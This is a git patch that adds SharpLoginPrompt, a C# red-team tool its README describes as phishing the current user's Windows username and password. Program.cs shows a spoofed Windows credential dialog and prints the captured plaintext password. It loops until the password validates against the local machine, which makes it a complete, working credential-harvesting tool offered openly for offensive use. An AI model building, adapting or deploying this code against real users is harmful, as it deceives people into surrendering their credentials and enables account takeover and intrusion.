From 18b1dfa48ae84997a6603f0eaa0227e976d5eaaf Mon Sep 17 00:00:00 2001 From: Khandelwal Date: Sun, 20 Oct 2019 13:37:39 +0800 Subject: [PATCH] first commit --- .vs/SharpLoginPrompt/v15/.suo | Bin 0 -> 26112 bytes README.md | 8 ++ SharpLoginPrompt.sln | 25 ++++ SharpLoginPrompt/Program.cs | 124 ++++++++++++++++++++ SharpLoginPrompt/Properties/AssemblyInfo.cs | 36 ++++++ SharpLoginPrompt/README.md | 1 + SharpLoginPrompt/SharpLoginPrompt.csproj | 50 ++++++++ 7 files changed, 244 insertions(+) create mode 100644 .vs/SharpLoginPrompt/v15/.suo create mode 100644 README.md create mode 100644 SharpLoginPrompt.sln create mode 100644 SharpLoginPrompt/Program.cs create mode 100644 SharpLoginPrompt/Properties/AssemblyInfo.cs create mode 100644 SharpLoginPrompt/README.md create mode 100644 SharpLoginPrompt/SharpLoginPrompt.csproj diff --git a/.vs/SharpLoginPrompt/v15/.suo b/.vs/SharpLoginPrompt/v15/.suo new file mode 100644 index 0000000000000000000000000000000000000000..5adafeb4e97c0dc0a0c77b5b649afca527da535a GIT binary patch literal 26112 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 P_LnWLzCm-Pwg3MBXNA2d literal 0 HcmV?d00001 diff --git a/README.md b/README.md new file mode 100644 index 0000000..cd2023c --- /dev/null +++ b/README.md @@ -0,0 +1,8 @@ +# SharpLoginPrompt + +This Program creates a login prompt to gather username and password of the current user. This project allows red team to phish username and password of the current user without touching lsass and having adminitrator credentials on the system. + +#Usage +run to launch it with default settings + +run to customize the login prompt diff --git a/SharpLoginPrompt.sln b/SharpLoginPrompt.sln new file mode 100644 index 0000000..97d883e --- /dev/null +++ b/SharpLoginPrompt.sln @@ -0,0 +1,25 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 15 +VisualStudioVersion = 15.0.28307.271 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpLoginPrompt", "SharpLoginPrompt\SharpLoginPrompt.csproj", "{C12E69CD-78A0-4960-AF7E-88CBD794AF97}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Debug|Any CPU.Build.0 = Debug|Any CPU + {C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Release|Any CPU.ActiveCfg = Release|Any CPU + {C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {4FD946E1-0FF2-405D-B247-CA1B920231C5} + EndGlobalSection +EndGlobal diff --git a/SharpLoginPrompt/Program.cs b/SharpLoginPrompt/Program.cs new file mode 100644 index 0000000..d05098a --- /dev/null +++ b/SharpLoginPrompt/Program.cs @@ -0,0 +1,124 @@ +using System; +using System.Net; +using System.DirectoryServices.AccountManagement; +using System.Runtime.InteropServices; +using System.Text; + +namespace SharpLoginPrompt +{ + class Program + { + + [DllImport("ole32.dll")] + public static extern void CoTaskMemFree(IntPtr ptr); + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] + private struct CREDUI_INFO + { + public int cbSize; + public IntPtr hwndParent; + public string pszMessageText; + public string pszCaptionText; + public IntPtr hbmBanner; + } + [DllImport("credui.dll", CharSet = CharSet.Auto)] + private static extern int CredUIPromptForWindowsCredentials(ref CREDUI_INFO notUsedHere, + int authError, + ref uint authPackage, + IntPtr InAuthBuffer, + uint InAuthBufferSize, + out IntPtr refOutAuthBuffer, + out uint refOutAuthBufferSize, + ref bool fSave, + int flags); + [DllImport("credui.dll", CharSet = CharSet.Auto)] + private static extern bool CredUnPackAuthenticationBuffer(int dwFlags, + IntPtr pAuthBuffer, + uint cbAuthBuffer, + StringBuilder pszUserName, + ref int pcchMaxUserName, + StringBuilder pszDomainName, + ref int pcchMaxDomainame, + StringBuilder pszPassword, + ref int pcchMaxPassword); + + + + static void Main(string[] args) + { + bool passwordOk = false; + while (passwordOk != true) + { + + CREDUI_INFO credui = new CREDUI_INFO(); + credui.pszCaptionText = args.Length ==2 ? args[0]:"Please enter the credentials"; + credui.pszMessageText = args.Length == 2 ? args[1] : "Domain: " + (Environment.GetEnvironmentVariable("USERDOMAIN").ToString() ?? Environment.GetEnvironmentVariable("HOSTNAME").ToString()); + credui.cbSize = Marshal.SizeOf(credui); + IntPtr outCredBuffer = new IntPtr(); + uint outCredSize; + bool save = false; + uint authPackage = 0; + + int result = CredUIPromptForWindowsCredentials(ref credui, + 0, + ref authPackage, + IntPtr.Zero, + 0, + out outCredBuffer, + out outCredSize, + ref save, + 0x1 + + /* Generic */); + var usernameBuf = new StringBuilder(100); + var passwordBuf = new StringBuilder(100); + var domainBuf = new StringBuilder(100); + + int maxUserName = 100; + int maxDomain = 100; + int maxPassword = 100; + if (result == 0) + { + if (CredUnPackAuthenticationBuffer(0, outCredBuffer, outCredSize, usernameBuf, ref maxUserName, + domainBuf, ref maxDomain, passwordBuf, ref maxPassword)) + { + CoTaskMemFree(outCredBuffer); + NetworkCredential networkCredential = new NetworkCredential() + { + UserName = usernameBuf.ToString(), + Password = passwordBuf.ToString(), + Domain = domainBuf.ToString() + + + }; + Console.WriteLine("Username = " + networkCredential.UserName); + Console.WriteLine("Password = " + networkCredential.Password); + Console.WriteLine("Doamain = " + networkCredential.Domain); + string userName; + if (networkCredential.UserName.ToString().Contains("\\")) + { + userName = networkCredential.UserName.ToString(); + } + else + { + userName = (Environment.GetEnvironmentVariable("USERDOMAIN").ToString() ?? Environment.GetEnvironmentVariable("HOSTNAME").ToString()) + "\\" + networkCredential.UserName.ToString(); + } + Console.WriteLine(userName); + try + { + PrincipalContext pcon = new PrincipalContext(ContextType.Machine, Environment.MachineName); + passwordOk = pcon.ValidateCredentials(userName, networkCredential.Password); + Console.WriteLine(passwordOk); + } + catch (System.DirectoryServices.AccountManagement.PrincipalOperationException) + { + passwordOk = false; + Console.WriteLine("Trying Again"); + } + + + } + } + } + } + } +} diff --git a/SharpLoginPrompt/Properties/AssemblyInfo.cs b/SharpLoginPrompt/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..320fc98 --- /dev/null +++ b/SharpLoginPrompt/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// General Information about an assembly is controlled through the following +// set of attributes. Change these attribute values to modify the information +// associated with an assembly. +[assembly: AssemblyTitle("SharpLoginPrompt")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("SharpLoginPrompt")] +[assembly: AssemblyCopyright("Copyright © 2019")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// Setting ComVisible to false makes the types in this assembly not visible +// to COM components. If you need to access a type in this assembly from +// COM, set the ComVisible attribute to true on that type. +[assembly: ComVisible(false)] + +// The following GUID is for the ID of the typelib if this project is exposed to COM +[assembly: Guid("c12e69cd-78a0-4960-af7e-88cbd794af97")] + +// Version information for an assembly consists of the following four values: +// +// Major Version +// Minor Version +// Build Number +// Revision +// +// You can specify all the values or you can default the Build and Revision Numbers +// by using the '*' as shown below: +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/SharpLoginPrompt/README.md b/SharpLoginPrompt/README.md new file mode 100644 index 0000000..59f92c5 --- /dev/null +++ b/SharpLoginPrompt/README.md @@ -0,0 +1 @@ +"# SharpLoginPrompt" diff --git a/SharpLoginPrompt/SharpLoginPrompt.csproj b/SharpLoginPrompt/SharpLoginPrompt.csproj new file mode 100644 index 0000000..088000d --- /dev/null +++ b/SharpLoginPrompt/SharpLoginPrompt.csproj @@ -0,0 +1,50 @@ + + + + + Debug + AnyCPU + {C12E69CD-78A0-4960-AF7E-88CBD794AF97} + Exe + SharpLoginPrompt + SharpLoginPrompt + v4.0 + 512 + true + + + AnyCPU + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + + + AnyCPU + pdbonly + true + bin\Release\ + TRACE + prompt + 4 + + + + + + + + + + + + + + + + + + \ No newline at end of file